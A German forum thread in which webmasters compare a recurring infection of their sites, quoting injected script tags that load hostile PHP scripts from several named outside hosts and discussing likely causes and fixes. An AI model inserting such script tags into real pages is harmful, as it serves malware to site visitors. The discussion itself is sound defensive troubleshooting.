Was mir zu dem Thema aufgefallen ist, das bei einigen Seiten ein Script direkt nach </head> eingebunden wurde:
</head><script src=http://cima-afrique.org/_private/style.php ></script>
(bloß nicht aufrufen bitte. Die ist echt Attakierend...)
der scheint bei einigen drin zu sein.
Noch schlimmer ist es, wenn ich die Seiten Betreiber dann anschreibe, denen genau sage was das Problem ist und die das noch nicht mal entfernen.....
Vielleicht hilft das ja weiter.
Beim Kollegen ist es dieses hier:
<script src=http://gnci-ict.com/images/cb6m/Thumbs.php ></script>
Die Adresse wechselt aber recht häufig.
Das baut sich dann in so ziemlich jedes .htm Dokument ein sowie in die ajax/global.ajax.js ganz unten.
Egal wie oft wir die infizierten Dateien schon von dem Code befreit haben (mitunter 150 betroffene Dateien), es kehrt immer wieder zurück.
YY Order!
hm, hört sich für mich nach ner namogopher.php an such mal nach ner Datei die so heisst, die pflanzt auch immer irgendwas in index.php und erstellt dazu ne .php in dem Bereich texte , sobald die was findet das mit 666 oder 777 Rechte versehen ist pflanzt die sich da rein
Nope, die Datei gibts bei ihm nicht, nur die gifimg.php im Ordner images, welche ebenfalls immer wieder zurückkehrt.
Hab grad im Klammforum noch was gelesen, die Seite milliarden-zocker.de scheint ebenfalls von sowas betroffen zu sein, dort ists diese Adresse:
<script src=http://kneipp-emden.de/monat/kita.php ></script>
Hab die Datei eben schon wieder löschen müssen.
YY Order!
@earl of midnight stimmt, da haben wir so manchen Server erst mal leer geräumt und alles neu und entvirt wieder hoch geschickt
ich hab mal die Google Suche nach: http://cima-afrique.org/_private/style.php
bemüht. Hier mal die Seiten die dazu ausgespuckt werden:
http://blog.unmaskparasites.com/2009...mblar-zombies/
http://blog.unmaskparasites.com/2009...jected-script/
http://cutephp.com/forum/index.php?showtopic=35676
http://badwarebusters.org/main/itemview/11643
Wenn ich zu diesem Thema auch noch:
http://www.arcor.de/content/pc_techn...n+Malware.html
nehme, handelt sich das um SQL-Injection....
In manchen Fällen ist sogar der Admin selber der "Schädling".
Wenn euer PC infizeirt ist, dann kann der lustige Dinge mit euren Dateien anstellen, die Ihr via FTP übertragt
(Abgesehen davon, dass die ja dann die FTP Zugangsdaten auch kennen).
Da hilft dann nicht mal Passwort ändern, weil da ja PC noch infiziert, bekommen die das neue Passwort ja gleich frei Haus geliefert...
Muss natürlich nicht sein, war aber schon oft so (daher würd ich das nicht ausschließen).
Wie man verhindern kann, dass die Dateien weiterhin verändert werden, hab ich ja vorher schon geschrieben, dafür gibt es ja (gehe mal von aus dass jeder der betroffenen Unix-basierten Server hat) die Rechteverwaltung auf Dateioperationen.
Sofern PHP bzw. FTP nicht unter root laufen (und dann könnt ihr euch auch gleich selbst ins Bein schießen), kann dann kein PHP Script noch ein User direkt via FTP die Dateien noch manipulieren.
Ihr zwar erstmal auch nicht, aber sohat man Zeit, Fehler+Lücken ausfindig zu machen.
Kleine Ankedote am Rande:
Hatte letztens jemand mit ähnlichen Symptomen, ich auch schon wild am Rätseln, bis ihm dann zufällig rausrutschte, dass er einen WebFTP Service die ganze Zeit benutzt hat
Klar, tolles Ding, an wildfremde Seiten im www FTP daten zu geben, damit die für Ihn Dateien, die er zu denen erst lädt, auf seinen Webspace hochladen
Seitdem muss er ohne FTP auskommen und "darf" alles über SVN machen
Kill one man, and you are a murderer.
Kill millions of men, and you are a conqueror.
Kill them all, and you are a god. - Jean Rostand, Thoughts of a Biologist (1939)
So etwas in der Art gab es vor ca 2 Jahren schon einmal, damals waren sämtliche Dateien betroffen deren Name index. enthielten.
War damals eine Sicherheitslücke in der Serversoftware die es ermöglichte Dateien zu verändern.
Berechtigungen
Zitieren
